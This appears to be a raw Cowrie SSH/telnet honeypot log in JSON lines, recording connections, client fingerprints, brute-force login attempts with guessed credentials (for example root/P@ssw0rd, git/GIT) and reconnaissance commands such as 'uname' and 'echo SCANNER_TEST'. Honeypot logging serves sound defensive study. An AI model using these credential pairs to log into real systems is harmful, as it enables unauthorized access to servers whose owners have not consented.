{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:38.603988Z","src_ip":"41.226.27.251","session":"f8ec758e337b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:39:38.637681Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T02:39:38.638413Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59208,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e13e14b84c7","protocol":"ssh","message":"New connection: 212.227.125.160:59208 (1.2.3.4:22) [session: 0e13e14b84c7]","sensor":"my-vps","timestamp":"2025-08-31T02:39:38.742481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:39.350768Z","src_ip":"212.227.125.160","session":"0e13e14b84c7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:39:39.351425Z","src_ip":"212.227.125.160","session":"0e13e14b84c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:40.190397Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:40.191630Z","src_ip":"201.148.180.50","session":"201d78a31e7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:39:41.420759Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:39:41.421509Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.login.failed","username":"es","password":"P@ssw0rd123","message":"login attempt [es/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:39:42.149442Z","src_ip":"212.227.125.160","session":"0e13e14b84c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2485,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1bc7e29668a","protocol":"ssh","message":"New connection: 212.227.235.229:2485 (1.2.3.4:22) [session: b1bc7e29668a]","sensor":"my-vps","timestamp":"2025-08-31T02:39:43.007171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.8.1_DEV","message":"Remote SSH version: SSH-2.0-libssh2_1.8.1_DEV","sensor":"my-vps","timestamp":"2025-08-31T02:39:43.019157Z","src_ip":"212.227.235.229","session":"b1bc7e29668a"}
{"eventid":"cowrie.client.kex","hassh":"2311efe7204dfc3007bb4ce758ac6a98","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc,none;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com,none;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc","none"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com","none"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2311efe7204dfc3007bb4ce758ac6a98","sensor":"my-vps","timestamp":"2025-08-31T02:39:43.123775Z","src_ip":"212.227.235.229","session":"b1bc7e29668a"}
{"eventid":"cowrie.login.failed","username":"git","password":"GIT","message":"login attempt [git/GIT] failed","sensor":"my-vps","timestamp":"2025-08-31T02:39:43.588724Z","src_ip":"212.227.235.229","session":"b1bc7e29668a"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:43.725957Z","src_ip":"212.227.125.160","session":"0e13e14b84c7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:44.696883Z","src_ip":"212.227.235.229","session":"b1bc7e29668a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:50.472764Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:50.473485Z","src_ip":"212.227.125.160","session":"2cafd568c7c5"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:52.072462Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"15.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:56.630545Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.session.closed","duration":"117.2","message":"Connection lost after 117.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:56.631612Z","src_ip":"212.227.125.160","session":"01659f9d678e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41592,"dst_ip":"1.2.3.4","dst_port":22,"session":"268e2a3d59ef","protocol":"ssh","message":"New connection: 41.226.27.251:41592 (1.2.3.4:22) [session: 268e2a3d59ef]","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.291293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.375386Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.376827Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.554711Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:39:57.659446Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.660325Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.705760Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:39:57.706923Z","src_ip":"41.226.27.251","session":"268e2a3d59ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42928,"dst_ip":"1.2.3.4","dst_port":23,"session":"40f51484eeb0","protocol":"telnet","message":"New connection: 212.227.235.229:42928 (1.2.3.4:23) [session: 40f51484eeb0]","sensor":"my-vps","timestamp":"2025-08-31T02:40:08.165827Z"}
{"eventid":"cowrie.session.closed","duration":4.897743225097656,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:13.063505Z","src_ip":"212.227.235.229","session":"40f51484eeb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57438,"dst_ip":"1.2.3.4","dst_port":23,"session":"c65f42ce951a","protocol":"telnet","message":"New connection: 212.227.235.229:57438 (1.2.3.4:23) [session: c65f42ce951a]","sensor":"my-vps","timestamp":"2025-08-31T02:40:13.278031Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33582,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eb79eda81b1","protocol":"ssh","message":"New connection: 212.227.235.229:33582 (1.2.3.4:22) [session: 0eb79eda81b1]","sensor":"my-vps","timestamp":"2025-08-31T02:40:16.039082Z"}
{"eventid":"cowrie.session.closed","duration":4.155085325241089,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.433049Z","src_ip":"212.227.235.229","session":"c65f42ce951a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50190,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e642596419e","protocol":"ssh","message":"New connection: 212.227.235.229:50190 (1.2.3.4:22) [session: 2e642596419e]","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.456129Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46086,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f92da1f374a","protocol":"ssh","message":"New connection: 41.226.27.251:46086 (1.2.3.4:22) [session: 6f92da1f374a]","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.555574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.556875Z","src_ip":"41.226.27.251","session":"6f92da1f374a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.600801Z","src_ip":"41.226.27.251","session":"6f92da1f374a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57446,"dst_ip":"1.2.3.4","dst_port":23,"session":"950057700a8b","protocol":"telnet","message":"New connection: 212.227.235.229:57446 (1.2.3.4:23) [session: 950057700a8b]","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.653390Z"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:17.781721Z","src_ip":"41.226.27.251","session":"6f92da1f374a"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:40:18.148528Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:40:18.639429Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:18.640860Z","src_ip":"212.227.235.229","session":"2e642596419e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:40:18.641472Z","src_ip":"212.227.235.229","session":"2e642596419e"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-31T02:40:18.658652Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T02:40:18.960177Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:19.026621Z","src_ip":"41.226.27.251","session":"6f92da1f374a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:20.714022Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.session.closed","duration":3.066452980041504,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:20.719778Z","src_ip":"212.227.235.229","session":"950057700a8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:40:21.388593Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:40:21.389351Z","src_ip":"212.227.235.229","session":"f48ec5f68d2a"}
{"eventid":"cowrie.login.failed","username":"es","password":"letmein","message":"login attempt [es/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:24.454972Z","src_ip":"212.227.235.229","session":"2e642596419e"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:40:26.325806Z","src_ip":"212.227.235.229","session":"2e642596419e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:33.393980Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:40:33.395644Z","src_ip":"212.227.235.229","session":"0eb79eda81b1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39594,"dst_ip":"1.2.3.4","dst_port":22,"session":"c57e7e2cb940","protocol":"ssh","message":"New connection: 41.226.27.251:39594 (1.2.3.4:22) [session: c57e7e2cb940]","sensor":"my-vps","timestamp":"2025-08-31T02:40:37.800391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:40:37.901240Z","src_ip":"41.226.27.251","session":"c57e7e2cb940"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:40:37.902030Z","src_ip":"41.226.27.251","session":"c57e7e2cb940"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:40:38.094996Z","src_ip":"41.226.27.251","session":"c57e7e2cb940"}
